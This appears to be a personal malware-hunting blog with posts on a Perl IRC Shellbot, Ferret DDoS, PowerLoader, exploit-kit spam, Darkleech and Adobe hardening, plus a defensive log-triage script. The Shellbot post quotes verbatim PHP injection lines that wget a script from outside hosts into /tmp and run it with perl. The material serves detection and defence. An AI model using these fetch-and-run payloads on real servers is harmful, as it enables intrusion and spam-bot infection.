HackerOne button, anyone?

2016.12.04

Hi, folks.

I was unable to find any official “blog button” for HackerOne: https://hackerone.com

So I made one myself. In case you need one too – feel free to copy the picture and the code to your site.

p.s. I know, it looks horrible 🙂 Do better and share.

Start copy here:

=============================

<a href="https://hackerone.com/[Your_H1_Profile]"><img src="http://ondailybasis.com/blog/wp-content/uploads/2016/12/h1.png" width="94" height="24" border="0" alt="View [Your_H1_Name]'s profile on HackerOne"></a><br>

=============================

End of copy

Good luck and happy hunting.

D.L.


Hoster changes rules, so do I :)

2014.10.16

Hi folks
Long time no see 🙂
Recently the hoster of this small blog updated its server software, and as a result every file, regardless of its extension, is executed according to its content. For example, the file knigi.php.txt, which I uploaded almost 3 years ago as source code to illustrate a scam with “Google.Files” [long before Google Drive was presented], now acts as a valid HTML\PHP file, redirecting visitors from my blog to dead landing pages.
Well, that’s unfortunate, but until they fix this – I will remove all html\php samples from here, so no one gets hurt.
By the way – are You still interested in malware hunting and new tricks from the field?
Stay safe
D.L.

“Perl IRC Shellbot” malware for servers

2014.05.02

Hi 🙂

Recently You may have seen strange input in Your server logs…

Something like:

<?php system("wget http://xxxxx.altervista.org/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://86.125.12.167/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

or

<?php system("wget http://94.23.42.103/lol.c -O /tmp/shz;perl /tmp/shz"); ?>

What does that mean? Well, first of all, Your server is potentially vulnerable to PHP code injection, at least. Check and update\patch\fix it.

Second – check for processes that run from the /tmp/ folder under the default Apache user. If there are any – You’ve been infected. Take care of it.

Now, how exactly does this stuff look?
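A small triage script, added here as an example (not part of the original post), that applies both checks above to constructed samples: it flags access-log requests carrying the injected `<?php system(... /tmp/ ...)` payload and lists processes owned by the web server user that reference /tmp/. URL-decoding the request first, the host name EXAMPLE-HOST and the user name www-data are all assumptions, not details from the post.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not real traffic); EXAMPLE-HOST is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/May/2014:10:11:12 +0000] "GET /index.php?page=<?php system("wget http://EXAMPLE-HOST/lol.c -O /tmp/shz;perl /tmp/shz"); ?> HTTP/1.1" 200 512',
    '10.0.0.6 - - [02/May/2014:10:11:13 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048',
    '10.0.0.7 - - [02/May/2014:10:11:14 +0000] "POST /upload.php?x=%3C%3Fphp%20system(%22wget%20http%3A%2F%2FEXAMPLE-HOST%2Flol.c%20-O%20%2Ftmp%2Fshz%3Bperl%20%2Ftmp%2Fshz%22)%3B%20%3F%3E HTTP/1.1" 403 0',
]

# Constructed `ps -eo user,pid,args` output; www-data is assumed to be the web server user.
SAMPLE_PS = [
    "USER       PID COMMAND",
    "root         1 /sbin/init",
    "www-data  1234 /usr/sbin/apache2 -k start",
    "www-data  2345 perl /tmp/shz",
    "www-data  2346 sh -c wget http://EXAMPLE-HOST/lol.c -O /tmp/shz;perl /tmp/shz",
    "dl        3000 vim /tmp/notes.txt",
]

# Injected PHP that shells out and stages something under /tmp, as in the log samples.
INJECT_RE = re.compile(r"<\?php\s+system\s*\(.*?/tmp/", re.IGNORECASE | re.DOTALL)


def find_injection_attempts(log_lines):
    """Return the log lines whose (URL-decoded) request carries the system()+/tmp payload."""
    return [line for line in log_lines if INJECT_RE.search(unquote(line))]


def procs_from_tmp(ps_lines, web_user="www-data"):
    """Return (pid, args) for web_user processes whose command line references /tmp/."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3 or not parts[1].isdigit():
            continue  # header or malformed line
        user, pid, args = parts
        if user == web_user and re.search(r"(^|\s)/tmp/", args):
            hits.append((int(pid), args))
    return hits


if __name__ == "__main__":
    for line in find_injection_attempts(SAMPLE_LOG):
        print("injection attempt:", line)
    for pid, args in procs_from_tmp(SAMPLE_PS):
        print("suspicious process:", pid, args)
```

On a live host the two inputs would come from the web server access log and from `ps -eo user,pid,args`; processes found this way should be inspected, not just killed, since the script is re-downloaded as long as the injection point remains open.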

Header: [image of the script header]

VT sample, in case You are curious: SHA256: 137bf0491f90742a6428a926ab30e29af0d9932389226bae3539c4482e123269

It’s an IRC-server-oriented bot, with SPAM as the main capability. The language looks like Portuguese – Brazilian?

It has also been seen in the wild since 2012 at least, Google says 🙂 But older versions had less functionality. And now it’s back 🙂

That’s how it behaves:

1. The script connects to an IRC server protected with credentials [unfortunately, it is not available now]

2. It fetches the list of mails, names and reply addresses from embedded URLs, composes the mail messages and sends them on behalf of the Apache user.

Among other bot capabilities:

  • Proxy server
  • Socks server
  • Backdoor – command request and execution

And, since fun is everything in malware hunting:

One of the functions: [image]

🙂 he\she is so excited 🙂

It’s not a new player on this game field, but recently he\she is back in business, so please be aware.

Well, review Your logs and\or update me, in case You have some additional info.

Stay safe

D.L.


Malware hunt – wildfowl to find

2014.01.31

More than twice in the last 24 hours I was asked the non-trivial question:

Where do You find targets for the malware hunt, if You’re not part of a big team, not a malware researcher, and do not own a honeynet?

Actually, if You do want to fight malware, IMHO it is very useful to have a honeypot system, or at least to be in the security business somehow. It will provide You a non-stop flow of malicious targets to review. But what if You are not, and You still want to help?

Disclaimer: All links provided lead to lists of malicious or potentially malicious resources. Do not click on any link there, and don’t run any file, without proper knowledge, a prepared environment and trained skills.

Well, here are a few links that aggregate the latest known threats, that You can practice on:

Ferret DDoS botnet v2.2 – inside the C&C panel

2013.12.23

Hi all

Today’s story is about the Ferret DDoS bot. 🙂

For those who missed it – I started to hunt Ferret about a month ago:

http://twitter.com/it4sec/status/407021953611210752

And about a week ago, research by Arbor Networks was posted with quite a nice analysis. Read it HERE.

Is it the end? 🙁 Nope.

Adobe – why are You still using it and how to replace it?

2013.10.05

If You are not yet aware of it, Adobe reported that the sources of a few of the most used applications on user desktops worldwide have been stolen.

As a result, we should definitely expect a wave of new 0days and more sophisticated attacks. If all the previous history of Adobe products has not convinced You to remove them from Your machine, I think now is the time 🙂

First of all – do You really need Adobe on Your [or Your customers’] machines?

For Flash: Many sophisticated streaming video services [YouTube as an example] have allowed You to see their content without Flash, based on HTML5 technology, for long enough. For the others – well, You may consider using PepperFlash [same sources, originally]. You may download streaming files from a bunch of services and watch them locally [VLC will help You out]. Or – don’t play games, decline to see tons of Flash ads and switch to non-Flash alternatives of Your favourite services. Contact vendors and tell them You are not using Flash anymore.

For Acrobat Reader: You already have plenty of options to choose from. Foxit, Nitro, Evince [my recommendations]. Yes, not all of them work with the browser, and not every application or web service knows how to interact with them. Your PC – Your choice 🙂

OK, let’s start:

OS:

Windows: Uninstall Adobe Flash and Adobe Acrobat Reader from Your computer and reboot.

Linux: use Your package manager. If You have no idea what I am talking about – You should learn a bit more about the system You are using. But, for instance – in graphical mode You have Software Center in Ubuntu and PackageKit in Fedora. 🙂

But that’s not all!

Flash Player:

In Firefox You may even disable Flash, or block its execution on a page without Your permission.

To completely disable it: Tools – Add-ons – Plugins – choose Shockwave Flash Player and select “Never Activate”, and then restart the browser.

To block it from execution: You may install a nice add-on called FlashBlock, which will allow You to permit execution of a Flash application one at a time. Here You are still vulnerable, but now it’s totally Your decision, and not the “good will” of the person who created the web page.

In Chrome You’ll need to disable the internal Flash plugin.

Enter “chrome://plugins/” in the browser address bar, with no quotes, press Enter and scroll down until the “Adobe Flash Player” block appears. Choose “Disable” and restart the browser.

In Internet Explorer You’ll need to go to Tools – Manage Add-ons, find Adobe * among the add-ons, pick each one of them and click “Disable”, and then restart the browser.

Well, maybe after all those changes the Internet becomes less familiar and a bit more difficult to find a suitable service in, but it is definitely faster, and way more secure for Your specific computer.

Good luck!

D.L.

p.s. Suggestions, replacements and ideas – in the comments; I will add them with proper credit 🙂

Update1: thx Mohab Ali for some fixes in the text 🙂

JavaScript PluginDetect is in the Past.

2013.07.14

Well, I am sick again, alone at home, so I am looking for something to dig into…

And, as it appears, there is always something interesting happening.

If You are familiar with ExploitKits, You know that the major feature of the traffic filter is PluginDetect.

It is a JS script with a huge number of features, provided by legitimate and respected authors.

Its main usage for malicious purposes – detecting outdated plug-ins in order to serve “working” exploits for successful infection of a victim.

Size – about 45-65 KB in plain text; in altered\obfuscated form it can reach 110-130 KB of JavaScript.

It is also known to be part of malicious applications, and is triggered accordingly. There are products that emulate JS and provide fake responses to PluginDetect in order to bypass it successfully.

Well, bottom line – it’s quite a mess to use it for traffic filtering.

But there are other ways, always…

“PowerLoader v2.0 and sons” – communication protocol details

2013.05.29

First of all – for those who do not know, what PowerLoader is:

[image of the Power Loader from ‘Aliens’]

From the ‘Aliens’ movie. I always wanted one to clean the mess in my room as a teenager.

But – we will talk about another Power Loader – v2.0

[image]

“NY TRAFFIC TICKET” SPAM is back

2013.03.27

Well, it was gone for a while, and here it is back 🙂

Email message sample: [image]

Actually the code looks like: [image]

The attack, actually, has been running for about 48 hours already, at least. You may see traces of it on URLQuery [36 entries by now]

When clicked – it leads to BHEK2 [image]

BHEK2 payload – Cridex [22/46] and Fareit.

The second binary is an interesting one, yes 🙂 Wait for updates.

Stay safe!

D.L.


Darkleech – malicious Apache mod anti-forensics – client-side.

2013.03.18

I wrote about Darkleech last year, and one of the questions remains – among the anti-forensics features of it that the seller declared was:

– frame delivered to unique users only, no frame on repeat.

So – how does it look for the victim, and how is it implemented?

Since then, Linux/Chapro.A was posted on SecLists and analysed by Kaspersky and ESET.

Afterwards Eric Romang provided some details showing that it appears to be a version of the Darkleech module.

And here it appears again: the UnixFreaxJP blog reports a massive attack on the Japanese segment of the Internet.

Well, it’s time to see whether it is DarkLeech and how the anti-forensics is implemented there, from the client PoV 🙂

Ok. Let’s look at any of the servers in the list: